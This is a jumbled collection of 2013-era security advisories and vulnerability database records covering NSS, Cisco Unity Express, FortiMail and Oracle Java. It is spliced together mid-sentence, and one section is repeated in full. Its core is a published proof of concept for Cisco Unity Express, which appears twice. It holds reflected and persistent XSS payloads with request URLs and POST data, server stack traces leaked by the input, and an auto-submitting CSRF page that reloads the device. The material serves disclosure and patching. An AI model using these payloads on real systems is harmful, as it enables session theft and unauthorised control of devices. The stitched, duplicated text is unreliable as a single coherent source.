This updated package provides updated components that include fixes for
various security issues. ============================================================================
Ubuntu Security Notice USN-1763-1
March 14, 2013
nss vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
NSS could be made to expose sensitive information over the network.
Software Description:
- nss: Network Security Service library
Details:
Nadhem Alfardan and Kenny Paterson discovered that the TLS protocol as used
in NSS was vulnerable to a timing side-channel attack known as the
"Lucky Thirteen" issue.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
libnss3 3.14.3-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
libnss3 3.14.3-0ubuntu0.12.04.1
Ubuntu 11.10:
libnss3 3.14.3-0ubuntu0.11.10.1
Ubuntu 10.04 LTS:
libnss3-1d 3.14.3-0ubuntu0.10.04.1
After a standard system update you need to restart any applications that
use NSS, such as Evolution and Chromium, to make all the necessary changes. The issue was not specific to Firefox but there was
evidence that one of the certificates was used for man-in-the-middle
(MITM) traffic management of domain names that the customer did not
legitimately own or control. This issue was resolved by revoking the
trust for these specific mis-issued certificates (CVE-2013-0743).
The sqlite3 update addresses a crash when using svn commit after
export MALLOC_CHECK_=3. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFRXs87mqjQ0CJFipgRApRiAKDfmdXjMRCxXRr7W07dZkd5EBbggACgvCFx
oo9AI76kr1Dhvb157gF22Cc=
=5H/+
-----END PGP SIGNATURE-----
.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/nss < 3.15.3 >= 3.15.3
Description
===========
Multiple vulnerabilities have been discovered in the Mozilla Network
Security Service. Please review the CVE identifiers referenced below
for more details about the vulnerabilities.
Impact
======
A remote attacker can cause a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Mozilla Network Security Service users should upgrade to the latest
version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nss-3.15.3"
Packages which depend on this library may need to be recompiled. Tools
such as revdep-rebuild may assist in identifying some of these
packages.
References
==========
[ 1 ] CVE-2013-1620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1620
[ 2 ] CVE-2013-1739
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1739
[ 3 ] CVE-2013-1741
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741
[ 4 ] CVE-2013-2566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566
[ 5 ] CVE-2013-5605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605
[ 6 ] CVE-2013-5606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606
[ 7 ] CVE-2013-5607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201302-0182 | CVE-2013-1471 | Fortinet FortiMail of admin/FEAdmin.html Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in admin/FEAdmin.html in Fortinet FortiMail before 4.3.4 on FortiMail Identity-Based Encryption (IBE) appliances allow user-assisted remote attackers to inject arbitrary web script or HTML via (1) the Add field for the Black List under Antispam Management User Preferences or (2) the User name field for the Personal Black/White List in the AntiSpam section. Fortinet FortiMail ID Base cipher (IBE) Runs on the appliance Fortinet FortiMail of admin/FEAdmin.html Contains a cross-site scripting vulnerability.By the attacker, through the following items, arbitrary Web Script or HTML May be inserted. FortiMail is currently the most flexible email security system, which can protect and deploy in various email structures and filter spam. Viruses and spyware, to achieve a comprehensive defense system. Multiple cross-site scripting vulnerabilities exist in admin/FEAdmin.html in Fortinet versions prior to FortiMail 4.3.4 on FortiMail Identity-Based Encryption (IBE) based applications. User-assisted attackers could exploit this vulnerability to inject arbitrary web scripts or HTML
| VAR-201302-0171 | CVE-2013-1114 | Cisco Unity Express Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Express before 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud87527. Cisco Unity Express Contains a cross-site scripting vulnerability. The problem is Bug ID CSCud87527 It is a problem.By any third party Web Script or HTML May be inserted.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
These issues are being tracked by Cisco Bug ID CSCud87527. Cisco Unity is an advanced unified communications solution for enterprise-level organizations that can provide powerful messaging services and intelligent voice messaging services. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities
# Reported: December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html
Cisco Advisory
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
Proof of Concept
XSS - CVE-2013-1114:
GET:
Reflective XSS & Info disclosure
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>
Information Disclosure
Location: /Web/WEB-INF/screens/main.jsp
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp
Internal Servlet Error:
javax.servlet.ServletException: invalid character at position 1 in >
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)
Root cause:
java.lang.NumberFormatException: invalid character at position 1 in >
java.lang.Throwable. (Throwable.java:166)
java.lang.Integer.parseInt (Integer.java:775)
java.lang.Integer.parseInt (Integer.java:262)
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)
POST:
Persistent XSS
http://X.X.X.X/Web/SA3/AddHoliday.do
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD
CSRF - CVE-2013-1120:
<html>
<!-- # Exploit Title: Cisco Unity Express CSRF
# Date: Discovered and reported December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# Software: Cisco Unity Express
# CVE : CVE-2013-1120 for the CSRF
# Note: All the HTML forms are susceptible to forgery -->
<head>
<title>Reload Cisco Unity Express CSRF</title>
</head>
<body>
<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">
<input type="hidden" name="submitType" value="RELOAD"/>
</form>
<script>
document.CUEreload.submit();
</script>
</body>
</html>
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Cisco Unity Express Cross-Site Scripting and Request Forgery
Vulnerabilities
SECUNIA ADVISORY ID:
SA52045
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52045/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
RELEASE DATE:
2013-02-04
DISCUSS ADVISORY:
http://secunia.com/advisories/52045/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52045/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Unity Express, which
can be exploited by malicious people to conduct cross-site scripting
and request forgery attacks.
1) Certain unspecified input is not properly sanitised before being
returned to the user.
2) The application allows users to perform certain actions via HTTP
requests without performing proper validity checks to verify the
requests. This can be exploited to perform certain actions when a
logged-in user visits a specially crafted web page.
The vulnerabilities are reported in versions prior to 8.0.
SOLUTION:
Upgrade to version 8.0 or later (please contact the vendor for more
information).
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Jacob Holcomb, Independent Security Evaluators
ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=28044
http://tools.cisco.com/security/center/viewAlert.x?alertId=28045
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0172 | CVE-2013-1120 | Cisco Unity Express Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisco Unity Express with software before 8.0 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCue35910. Cisco Unity Express Contains a cross-site request forgery vulnerability. The problem is Bug ID CSCue35910 It is a problem.Authentication may be hijacked by a third party.
Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. Cisco Unity is an advanced unified communications solution for enterprise-level organizations that can provide powerful messaging services and intelligent voice messaging services. Through an unknown vector, a remote attacker could exploit this vulnerability to hijack the authentication information of an unknown victim user. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities
# Reported: December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html
Cisco Advisory
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
Proof of Concept
XSS - CVE-2013-1114:
GET:
Reflective XSS & Info disclosure
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>
Information Disclosure
Location: /Web/WEB-INF/screens/main.jsp
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp
Internal Servlet Error:
javax.servlet.ServletException: invalid character at position 1 in >
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)
Root cause:
java.lang.NumberFormatException: invalid character at position 1 in >
java.lang.Throwable. (Throwable.java:166)
java.lang.Integer.parseInt (Integer.java:775)
java.lang.Integer.parseInt (Integer.java:262)
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)
POST:
Persistent XSS
http://X.X.X.X/Web/SA3/AddHoliday.do
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD
CSRF - CVE-2013-1120:
<html>
<!-- # Exploit Title: Cisco Unity Express CSRF
# Date: Discovered and reported December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# Software: Cisco Unity Express
# CVE : CVE-2013-1120 for the CSRF
# Note: All the HTML forms are susceptible to forgery -->
<head>
<title>Reload Cisco Unity Express CSRF</title>
</head>
<body>
<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">
<input type="hidden" name="submitType" value="RELOAD"/>
</form>
<script>
document.CUEreload.submit();
</script>
</body>
</html>
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Cisco Unity Express Cross-Site Scripting and Request Forgery
Vulnerabilities
SECUNIA ADVISORY ID:
SA52045
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52045/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
RELEASE DATE:
2013-02-04
DISCUSS ADVISORY:
http://secunia.com/advisories/52045/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52045/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Unity Express, which
can be exploited by malicious people to conduct cross-site scripting
and request forgery attacks.
1) Certain unspecified input is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected
site.
2) The application allows users to perform certain actions via HTTP
requests without performing proper validity checks to verify the
requests. This can be exploited to perform certain actions when a
logged-in user visits a specially crafted web page.
The vulnerabilities are reported in versions prior to 8.0.
SOLUTION:
Upgrade to version 8.0 or later (please contact the vendor for more
information).
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Jacob Holcomb, Independent Security Evaluators
ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=28044
http://tools.cisco.com/security/center/viewAlert.x?alertId=28045
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0406 | CVE-2013-1479 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, and JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the JavaFX D3DRendererDelegate class. A value utilized by the class constructor is passed to a native function and is interpreted as a pointer to an object. An attacker could leverage this to gain remote code execution under the context of the process.
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it.
This vulnerability affects the following supported versions:
7 Update 11, 6 Update 38, JavaFX 2.2.4. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
